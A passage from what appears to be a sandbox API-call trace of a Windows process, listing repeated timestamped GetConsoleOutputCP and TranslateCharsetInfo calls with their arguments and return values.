lpSrc=0x1b5, lpCs=0x1b83ddd8) returned 0 [0288.656] GetConsoleOutputCP () returned 0x1b5 [0288.721] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b83dd78, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b83dd78) returned 0 [0288.721] GetConsoleOutputCP () returned 0x1b5 [0288.833] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b83dd18, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b83dd18) returned 0 [0288.834] GetConsoleOutputCP () returned 0x1b5 [0289.069] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b83dd78, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b83dd78) returned 0 [0289.071] GetConsoleOutputCP () returned 0x1b5 [0289.089] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b83def8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b83def8) returned 0 [0289.089] GetConsoleOutputCP () returned 0x1b5 [0289.136] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b83def8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b83def8) returned 0 [0289.136] GetConsoleOutputCP () returned 0x1b5 [0289.352] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b83def8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b83def8) returned 0 [0289.353] GetConsoleOutputCP () returned 0x1b5 [0289.518] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b83def8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b83def8) returned 0 [0289.518] GetConsoleOutputCP () returned 0x1b5 [0289.841] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b83def8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b83def8) returned 0 [0289.841] GetConsoleOutputCP () returned 0x1b5 [0290.030] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b83def8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b83def8) returned 0 [0290.030] GetConsoleOutputCP () returned 0x1b5 [0290.046] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b83def8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b83def8) returned 0 [0290.047] GetConsoleOutputCP () returned 0x1b5 [0290.086] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b83def8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b83def8) returned 0 [0290.087] GetConsoleOutputCP () returned 0x1b5 [0290.098] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b83def8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b83def8) returned 0 [0290.098] GetConsoleOutputCP () returned 0x1b5 [0290.104] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b83def8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b83def8) returned 0 [0290.104] GetConsoleOutputCP () returned 0x1b5 [0290.275] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b83def8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b83def8) returned 0 [0290.275] GetConsoleOutputCP () returned 0x1b5 [0290.439] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b83def8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b83def8) returned 0 [0290.439] GetConsoleOutputCP () returned 0x1b5 [0290.708] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b83def8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b83def8) returned 0 [0290.709] GetConsoleOutputCP () returned 0x1b5 [0290.739] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b83def8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b83def8) returned 0 [0290.739] GetConsoleOutputCP () returned 0x1b5 [0290.760] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b83def8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b83def8) returned 0 [0290.760] GetConsoleOutputCP () returned 0x1b5 [0290.787] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b83def8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b83def8) returned 0 [0290.787] GetConsoleOutputCP () returned 0x1b5 [0290.888] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b83def8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b83def8) returned 0 [0290.888] GetConsoleOutputCP () returned 0x1b5 [0290.963] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b83def8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b83def8) returned 0 [0290.963] GetConsoleOutputCP () returned 0x1b5 [0291.342] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b83def8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b83def8) returned 0 [0291.342] GetConsoleOutputCP () returned 0x1b5 [0291.430] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b83def8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b83def8) returned 0 [0291.430] GetConsoleOutputCP () returned 0x1b5 [0291.679] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b83def8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b83def8) returned 0 [0291.679] GetConsoleOutputCP () returned 0x1b5 [0291.748] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b83def8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b83def8) returned 0 [0291.748] GetConsoleOutputCP () returned 0x1b5 [0291.936] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b83def8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b83def8) returned 0 [0291.936] GetConsoleOutputCP () returned 0x1b5 [0292.053] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b83def8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b83def8) returned 0 [0292.054] GetConsoleOutputCP () returned 0x1b5 [0292.795] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b83def8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b83def8) returned 0 [0292.795] GetConsoleOutputCP () returned 0x1b5 [0293.000] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b83def8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b83def8) returned 0 [0293.001] GetConsoleOutputCP () returned 0x1b5 [0293.216] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b83def8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b83def8) returned 0 [0293.217] GetConsoleOutputCP () returned 0x1b5 [0293.310] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b83def8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b83def8) returned 0 [0293.310] GetConsoleOutputCP () returned 0x1b5 [0293.338] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b83def8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b83def8) returned 0 [0293.338] GetConsoleOutputCP () returned 0x1b5 [0293.389] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b83def8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b83def8) returned 0 [0293.389] GetConsoleOutputCP () returned 0x1b5 [0293.412] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b83def8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b83def8) returned 0 [0293.412] GetConsoleOutputCP () returned 0x1b5 [0293.414] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b83def8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b83def8) returned 0 [0293.414] GetConsoleOutputCP () returned 0x1b5 [0293.416] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b83def8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b83def8) returned 0 [0293.416] GetConsoleOutputCP () returned 0x1b5 [0293.417] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b83def8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b83def8) returned 0 [0293.417] GetConsoleOutputCP () returned 0x1b5 [0293.419] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b83def8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b83def8) returned 0 [0293.419] GetConsoleOutputCP () returned 0x1b5 [0293.446] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b83def8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b83def8) returned 0 [0293.446] GetConsoleOutputCP () returned 0x1b5 [0293.603] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b83def8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b83def8) returned 0 [0293.603] GetConsoleOutputCP () returned 0x1b5 [0293.708] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b83def8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b83def8) returned 0 [0293.708] GetConsoleOutputCP () returned 0x1b5 [0293.836] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b83def8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b83def8) returned 0 [0293.836] GetConsoleOutputCP () returned 0x1b5 [0293.840] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b83def8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b83def8) returned 0 [0293.840] GetConsoleOutputCP () returned 0x1b5 [0293.854] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b83def8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b83def8) returned 0 [0293.854] GetConsoleOutputCP () returned 0x1b5 [0293.862] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b83def8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b83def8) returned 0 [0293.863] GetConsoleOutputCP () returned 0x1b5 [0293.867] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b83def8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b83def8) returned 0 [0293.867] GetConsoleOutputCP () returned 0x1b5 [0293.870] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b83def8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b83def8) returned 0 [0293.870] GetConsoleOutputCP () returned 0x1b5 [0293.875] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b83def8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b83def8) returned 0 [0293.875] GetConsoleOutputCP () returned 0x1b5 [0293.924] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b83def8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b83def8) returned 0 [0293.924] GetConsoleOutputCP () returned 0x1b5 [0294.035] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b83def8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b83def8) returned 0 [0294.035] GetConsoleOutputCP () returned 0x1b5 [0294.202] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b83def8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b83def8) returned 0 [0294.202] GetConsoleOutputCP () returned 0x1b5 [0294.624] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b83def8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b83def8) returned 0 [0294.624] GetConsoleOutputCP () returned 0x1b5 [0294.760] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b83def8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b83def8) returned 0 [0294.760] GetConsoleOutputCP () returned 0x1b5 [0294.960] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b83def8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b83def8) returned 0 [0294.960] GetConsoleOutputCP () returned 0x1b5 [0295.282] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b83def8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b83def8) returned 0 [0295.283] GetConsoleOutputCP () returned 0x1b5 [0295.717] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b83def8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b83def8) returned 0 [0295.717] GetConsoleOutputCP () returned 0x1b5 [0295.824] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b83def8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b83def8) returned 0 [0295.824] GetConsoleOutputCP () returned 0x1b5 [0295.999] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b83def8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b83def8) returned 0 [0295.999] GetConsoleOutputCP () returned 0x1b5 [0296.031] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b83def8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b83def8) returned 0 [0296.031] GetConsoleOutputCP () returned 0x1b5 [0296.078] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b83def8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b83def8) returned 0 [0296.078] GetConsoleOutputCP () returned 0x1b5 [0296.313] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b83def8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b83def8) returned 0 [0296.313] GetConsoleOutputCP () returned 0x1b5 [0296.547] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b83def8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b83def8) returned 0 [0296.547] GetConsoleOutputCP () returned 0x1b5 [0296.823] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b83def8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b83def8) returned 0 [0296.823] GetConsoleOutputCP () returned 0x1b5 [0296.830] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b83def8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b83def8) returned 0 [0296.830] GetConsoleOutputCP () returned 0x1b5 [0296.836] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b83def8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b83def8) returned 0 [0296.837] GetConsoleOutputCP () returned 0x1b5 [0296.839] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b83def8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b83def8) returned 0 [0296.839] GetConsoleOutputCP () returned 0x1b5 [0296.926] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b83def8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b83def8) returned 0 [0296.926] GetConsoleOutputCP () returned 0x1b5 [0297.028] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b83def8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b83def8) returned 0 [0297.028] GetConsoleOutputCP () returned 0x1b5 [0297.222] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b83def8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b83def8) returned 0 [0297.222] GetConsoleOutputCP () returned 0x1b5 [0297.227] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b83def8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b83def8) returned 0 [0297.227] GetConsoleOutputCP () returned 0x1b5 [0297.233] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b83def8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b83def8) returned 0 [0297.233] GetConsoleOutputCP () returned 0x1b5 [0297.237] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b83def8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b83def8) returned 0 [0297.237] GetConsoleOutputCP () returned 0x1b5 [0297.313] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b83def8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b83def8) returned 0 [0297.313] GetConsoleOutputCP () returned 0x1b5 [0297.406] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b83def8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b83def8) returned 0 [0297.407] GetConsoleOutputCP () returned 0x1b5 [0297.450] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b83def8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b83def8) returned 0 [0297.450] GetConsoleOutputCP () returned 0x1b5 [0297.578] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b83def8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b83def8) returned 0 [0297.579] GetConsoleOutputCP () returned 0x1b5 [0297.747] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b83def8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b83def8) returned 0 [0297.748] GetConsoleOutputCP () returned 0x1b5 [0297.751] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b83def8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b83def8) returned 0 [0297.751] GetConsoleOutputCP () returned 0x1b5 [0297.984] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b83def8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b83def8) returned 0 [0297.985] GetConsoleOutputCP () returned 0x1b5 [0298.096] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b83def8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b83def8) returned 0 [0298.096] GetConsoleOutputCP () returned 0x1b5 [0298.158] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b83def8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b83def8) returned 0 [0298.158] GetConsoleOutputCP () returned 0x1b5 [0298.166] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b83def8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b83def8) returned 0 [0298.166] GetConsoleOutputCP () returned 0x1b5 [0298.174] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b83def8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b83def8) returned 0 [0298.174] GetConsoleOutputCP () returned 0x1b5 [0298.250] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b83def8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b83def8) returned 0 [0298.250] GetConsoleOutputCP () returned 0x1b5 [0298.346] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b83def8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b83def8) returned 0 [0298.346] GetConsoleOutputCP () returned 0x1b5 [0298.754] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b83def8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b83def8) returned 0 [0298.754] GetConsoleOutputCP () returned 0x1b5 [0298.842] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b83def8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b83def8) returned 0 [0298.842] GetConsoleOutputCP () returned 0x1b5 [0298.850] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b83def8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b83def8) returned 0 [0298.850] GetConsoleOutputCP () returned 0x1b5 [0298.854] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b83def8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b83def8) returned 0 [0298.854] GetConsoleOutputCP () returned 0x1b5 [0298.894] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b83def8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b83def8) returned 0 [0298.894] GetConsoleOutputCP () returned 0x1b5 [0298.985] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b83def8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b83def8) returned 0 [0298.985] GetConsoleOutputCP () returned 0x1b5 [0299.021] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b83def8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b83def8) returned 0 [0299.021] GetConsoleOutputCP () returned 0x1b5 [0299.027] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b83def8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b83def8) returned 0 [0299.027] GetConsoleOutputCP () returned 0x1b5 [0299.033] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b83def8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b83def8) returned 0 [0299.033] GetConsoleOutputCP () returned 0x1b5 [0299.035] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b83def8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b83def8) returned 0 [0299.035] GetConsoleOutputCP () returned 0x1b5 [0299.038] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b83def8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b83def8) returned 0 [0299.038] GetConsoleOutputCP () returned 0x1b5 [0299.040] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b83def8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b83def8) returned 0 [0299.040] GetConsoleOutputCP () returned 0x1b5 [0299.063] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b83def8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b83def8) returned 0 [0299.063] GetConsoleOutputCP () returned 0x1b5 [0299.107] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b83def8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b83def8) returned 0 [0299.107] GetConsoleOutputCP () returned 0x1b5 [0299.328] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b83def8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b83def8) returned 0 [0299.328] GetConsoleOutputCP () returned 0x1b5 [0299.626] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b83def8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b83def8) returned 0 [0299.626] GetConsoleOutputCP () returned 0x1b5 [0299.771] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b83def8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b83def8) returned 0 [0299.771] GetConsoleOutputCP () returned 0x1b5 [0299.795] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b83def8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b83def8) returned 0 [0299.795] GetConsoleOutputCP () returned 0x1b5 [0299.801] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b83def8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b83def8) returned 0 [0299.801] GetConsoleOutputCP () returned 0x1b5 [0299.844] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b83def8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b83def8) returned 0 [0299.844] GetConsoleOutputCP () returned 0x1b5 [0299.932] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b83def8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b83def8) returned 0 [0299.932] GetConsoleOutputCP () returned 0x1b5 [0300.130] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b83def8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b83def8) returned 0 [0300.130] GetConsoleOutputCP () returned 0x1b5 [0300.228] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b83def8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b83def8) returned 0 [0300.228] GetConsoleOutputCP () returned 0x1b5 [0300.256] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b83def8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b83def8) returned 0 [0300.256] GetConsoleOutputCP () returned 0x1b5 [0300.286] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b83def8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b83def8) returned 0 [0300.286] GetConsoleOutputCP () returned 0x1b5 [0300.339] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b83def8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b83def8) returned 0 [0300.339] GetConsoleOutputCP () returned 0x1b5 [0300.340] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b83def8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b83def8) returned 0 [0300.340] GetConsoleOutputCP () returned 0x1b5 [0300.342] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b83def8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b83def8) returned 0 [0300.342] GetConsoleOutputCP () returned 0x1b5 [0300.343] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b83def8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b83def8) returned 0 [0300.344] GetConsoleOutputCP () returned 0x1b5 [0300.348] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b83def8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b83def8) returned 0 [0300.348] GetConsoleOutputCP () returned 0x1b5 [0300.499] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b83def8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b83def8) returned 0 [0300.499] GetConsoleOutputCP () returned 0x1b5 [0300.525] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b83def8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b83def8) returned 0 [0300.525] GetConsoleOutputCP () returned 0x1b5 [0300.530] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b83def8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b83def8) returned 0 [0300.530] GetConsoleOutputCP () returned 0x1b5 [0300.594] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b83def8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b83def8) returned 0 [0300.594] GetConsoleOutputCP () returned 0x1b5 [0300.641] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b83def8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b83def8) returned 0 [0300.641] GetConsoleOutputCP () returned 0x1b5 [0300.643] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b83def8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b83def8) returned 0 [0300.643] GetConsoleOutputCP () returned 0x1b5 [0300.645] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b83def8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b83def8) returned 0 [0300.645] GetConsoleOutputCP () returned 0x1b5 [0300.646] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b83def8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b83def8) returned 0 [0300.646] GetConsoleOutputCP () returned 0x1b5 [0300.647] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b83def8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b83def8) returned 0 [0300.647] GetConsoleOutputCP () returned 0x1b5 [0300.649] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b83def8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b83def8) returned 0 [0300.649] GetConsoleOutputCP () returned 0x1b5 [0300.752] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b83def8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b83def8) returned 0 [0300.752] GetConsoleOutputCP () returned 0x1b5 [0300.884] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b83def8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b83def8) returned 0 [0300.884] GetConsoleOutputCP () returned 0x1b5 [0301.031] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b83def8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b83def8) returned 0 [0301.032] GetConsoleOutputCP () returned 0x1b5 [0301.132] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b83def8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b83def8) returned 0 [0301.132] GetConsoleOutputCP () returned 0x1b5 [0301.142] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b83def8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b83def8) returned 0 [0301.142] 